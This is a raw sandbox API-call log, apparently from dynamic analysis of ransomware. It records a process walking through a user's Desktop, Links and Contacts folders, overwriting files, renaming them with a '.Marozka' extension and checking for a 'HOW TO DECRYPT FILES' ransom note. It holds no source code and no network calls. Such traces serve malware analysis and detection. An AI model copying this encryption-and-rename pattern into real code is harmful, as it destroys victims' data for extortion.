lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv.Marozka", lpFilePart=0x0) returned 0x3e [0048.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0048.034] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\yfzaj.mkv"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75eafdd0, ftCreationTime.dwHighDateTime=0x1d4cd41, ftLastAccessTime.dwLowDateTime=0x71884960, ftLastAccessTime.dwHighDateTime=0x1d4c9f3, ftLastWriteTime.dwLowDateTime=0xdf5cccca, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x3df0)) returned 1 [0048.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0048.035] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\yfzaj.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\yfzaJ.mkv.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\kbzw7l4eeuzyo_embyqh\\yfzaj.mkv.marozka")) returned 1 [0048.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.035] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links", lpFilePart=0x0) returned 0x15 [0048.035] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dbc8 [0048.036] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.036] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.036] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.036] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.036] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.036] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.036] FindClose (in: hFindFile=0xa7dbc8 | out: hFindFile=0xa7dbc8) returned 1 [0048.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.037] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links", lpFilePart=0x0) returned 0x15 [0048.037] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dac8 [0048.037] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.037] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.037] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.038] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.038] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.038] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.038] FindClose (in: hFindFile=0xa7dac8 | out: hFindFile=0xa7dac8) returned 1 [0048.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.038] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x21 [0048.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.038] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" (normalized: "c:\\users\\fd1hvy\\links\\desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.042] GetFileType (hFile=0x2e0) returned 0x1 [0048.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.042] GetFileType (hFile=0x2e0) returned 0x1 [0048.042] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1f5 [0048.042] ReadFile (in: hFile=0x2e0, lpBuffer=0x26e75e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26e75e0*, lpNumberOfBytesRead=0x5beabc*=0x1f5, lpOverlapped=0x0) returned 1 [0048.043] CloseHandle (hObject=0x2e0) returned 1 [0048.126] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.127] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x21 [0048.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.127] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" (normalized: "c:\\users\\fd1hvy\\links\\desktop.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.128] GetFileType (hFile=0x2e0) returned 0x1 [0048.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.128] GetFileType (hFile=0x2e0) returned 0x1 [0048.129] WriteFile (in: hFile=0x2e0, lpBuffer=0x2736028*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x5bea84, lpOverlapped=0x0 | out: lpBuffer=0x2736028*, lpNumberOfBytesWritten=0x5bea84*=0x200, lpOverlapped=0x0) returned 1 [0048.129] CloseHandle (hObject=0x2e0) returned 1 [0048.134] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x21 [0048.135] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Desktop.lnk.Marozka", lpFilePart=0x0) returned 0x29 [0048.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.135] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" (normalized: "c:\\users\\fd1hvy\\links\\desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4428f2bb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4428f2bb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xdf6b1b79, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x200)) returned 1 [0048.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.136] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk" (normalized: "c:\\users\\fd1hvy\\links\\desktop.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\Links\\Desktop.lnk.Marozka" (normalized: "c:\\users\\fd1hvy\\links\\desktop.lnk.marozka")) returned 1 [0048.193] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x23 [0048.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" (normalized: "c:\\users\\fd1hvy\\links\\downloads.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.194] GetFileType (hFile=0x2e0) returned 0x1 [0048.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.194] GetFileType (hFile=0x2e0) returned 0x1 [0048.194] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x3ae [0048.194] ReadFile (in: hFile=0x2e0, lpBuffer=0x27375f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27375f0*, lpNumberOfBytesRead=0x5beabc*=0x3ae, lpOverlapped=0x0) returned 1 [0048.207] CloseHandle (hObject=0x2e0) returned 1 [0048.260] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.261] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x23 [0048.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.261] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" (normalized: "c:\\users\\fd1hvy\\links\\downloads.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.262] GetFileType (hFile=0x2e0) returned 0x1 [0048.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.262] GetFileType (hFile=0x2e0) returned 0x1 [0048.262] WriteFile (in: hFile=0x2e0, lpBuffer=0x27868a8*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x5bea84, lpOverlapped=0x0 | out: lpBuffer=0x27868a8*, lpNumberOfBytesWritten=0x5bea84*=0x3b0, lpOverlapped=0x0) returned 1 [0048.263] CloseHandle (hObject=0x2e0) returned 1 [0048.266] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x23 [0048.267] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\Downloads.lnk.Marozka", lpFilePart=0x0) returned 0x2b [0048.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.267] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" (normalized: "c:\\users\\fd1hvy\\links\\downloads.lnk"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b54f3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x442b54f3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xdf808fa9, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x3b0)) returned 1 [0048.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.267] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk" (normalized: "c:\\users\\fd1hvy\\links\\downloads.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\Links\\Downloads.lnk.Marozka" (normalized: "c:\\users\\fd1hvy\\links\\downloads.lnk.marozka")) returned 1 [0048.268] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", lpFilePart=0x0) returned 0x22 [0048.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" (normalized: "c:\\users\\fd1hvy\\links\\onedrive.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.270] GetFileType (hFile=0x2e0) returned 0x1 [0048.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.270] GetFileType (hFile=0x2e0) returned 0x1 [0048.270] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x53a [0048.270] ReadFile (in: hFile=0x2e0, lpBuffer=0x2788008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2788008*, lpNumberOfBytesRead=0x5beabc*=0x53a, lpOverlapped=0x0) returned 1 [0048.323] CloseHandle (hObject=0x2e0) returned 1 [0048.355] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.355] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.356] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", lpFilePart=0x0) returned 0x22 [0048.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.356] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" (normalized: "c:\\users\\fd1hvy\\links\\onedrive.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.359] GetFileType (hFile=0x2e0) returned 0x1 [0048.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.359] GetFileType (hFile=0x2e0) returned 0x1 [0048.359] WriteFile (in: hFile=0x2e0, lpBuffer=0x27d7a94*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x5bea84, lpOverlapped=0x0 | out: lpBuffer=0x27d7a94*, lpNumberOfBytesWritten=0x5bea84*=0x540, lpOverlapped=0x0) returned 1 [0048.360] CloseHandle (hObject=0x2e0) returned 1 [0048.362] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk", lpFilePart=0x0) returned 0x22 [0048.362] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk.Marozka", lpFilePart=0x0) returned 0x2a [0048.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.362] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" (normalized: "c:\\users\\fd1hvy\\links\\onedrive.lnk"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3190fb5, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xdf8f15f8, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x540)) returned 1 [0048.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.362] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk" (normalized: "c:\\users\\fd1hvy\\links\\onedrive.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\Links\\OneDrive.lnk.Marozka" (normalized: "c:\\users\\fd1hvy\\links\\onedrive.lnk.marozka")) returned 1 [0048.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.364] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Contacts", lpFilePart=0x0) returned 0x18 [0048.364] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dc08 [0048.364] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.364] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.364] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.365] FindClose (in: hFindFile=0xa7dc08 | out: hFindFile=0xa7dc08) returned 1 [0048.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.365] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Contacts", lpFilePart=0x0) returned 0x18 [0048.365] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0048.365] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.365] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.366] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.366] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0048.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.366] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0048.366] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0048.366] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.367] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.367] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.367] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.367] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.367] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.367] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.368] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.368] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.368] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.368] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.368] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.368] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.368] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.369] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.369] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.369] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.369] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.369] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.369] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.369] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.370] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.370] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.370] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.370] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.370] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.370] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.370] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.371] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.371] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.371] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.371] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.371] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.371] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: 